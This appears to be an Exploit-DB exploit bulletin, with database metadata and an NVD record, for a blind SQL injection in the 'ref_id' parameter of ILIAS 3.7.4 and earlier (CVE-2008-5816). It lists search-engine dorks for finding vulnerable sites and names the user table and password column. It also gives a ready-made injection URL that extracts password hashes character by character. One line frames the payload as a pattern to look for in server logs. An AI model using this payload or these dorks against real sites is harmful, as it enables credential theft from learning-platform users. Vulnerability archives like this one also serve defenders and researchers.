ID EDB-ID:7570
Type exploitdb
Reporter Lidloses_Auge
Modified 2008-12-24T00:00:00
Description
ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability. CVE-2008-5816. Webapps exploit for php platform
###############################################################
#
# ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability
#
# Vulnerability discovered by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# Palme, GPM, karamble, Free-Hack
# Date: 24.12.2008
#
###############################################################
#
# Developer: http://www.ilias.de
# Dork 1: "powered by ILIAS"
# Dork 2: inurl:repository.php ilias
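# Description: The GET parameter "ref_id" of "repository.php" is vulnerable
# to blind SQL injection (CVE-2008-5816); ILIAS 3.7.4 and earlier are affected.
# SQL keywords inside the ref_id value, as in the example below, are the
# request pattern to look for in web-server logs.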
#
# Usertable: usr_data
# Important columns: usr_id, login, passwd
#
# Example:
# http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
#
###############################################################
# milw0rm.com [2008-12-24]
{"id": "EDB-ID:7570", "hash": "8f2e7856d1c8be8cc6f516e352025be5", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ILIAS <= 3.7.4 ref_id Blind SQL Injection Vulnerability", "description": "ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability. CVE-2008-5816. Webapps exploit for php platform", "published": "2008-12-24T00:00:00", "modified": "2008-12-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7570/", "reporter": "Lidloses_Auge", "references": [], "cvelist": ["CVE-2008-5816"], "lastseen": "2016-02-01T03:30:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-01T03:30:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5816"]}], "modified": "2016-02-01T03:30:55"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7570/", "sourceData": "###############################################################\n#\n# ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability \n# \n# Vulnerability discovered by: Lidloses_Auge \n# Greetz to: -=Player=- , Suicide, g4ms3, enco,\n# Palme, GPM, karamble, Free-Hack\n# Date: 24.12.2008\n#\n###############################################################\n# \n# Developer: http://www.ilias.de\n# Dork 1: \"powered by ILIAS\"\n# Dork 2: inurl:repository.php ilias\n# Description: The GET Parameter \"ref_id\" in \"repository.php\"\n#\t\t contains a Blind SQL Injection Vulnerability\n#\n# Usertable: usr_data\n# Important columns: usr_id, login, passwd\n#\n# Example:\n# http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--\n# \n###############################################################\n\n# milw0rm.com [2008-12-24]\n", "osvdbidlist": ["51138"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", 
"_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:29", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in repository.php in ILIAS 3.7.4 and earlier allows remote attackers to execute arbitrary SQL commands via the ref_id parameter.", "modified": "2017-09-29T01:32:00", "id": "CVE-2008-5816", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5816", "published": "2009-01-02T18:11:00", "title": "CVE-2008-5816", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}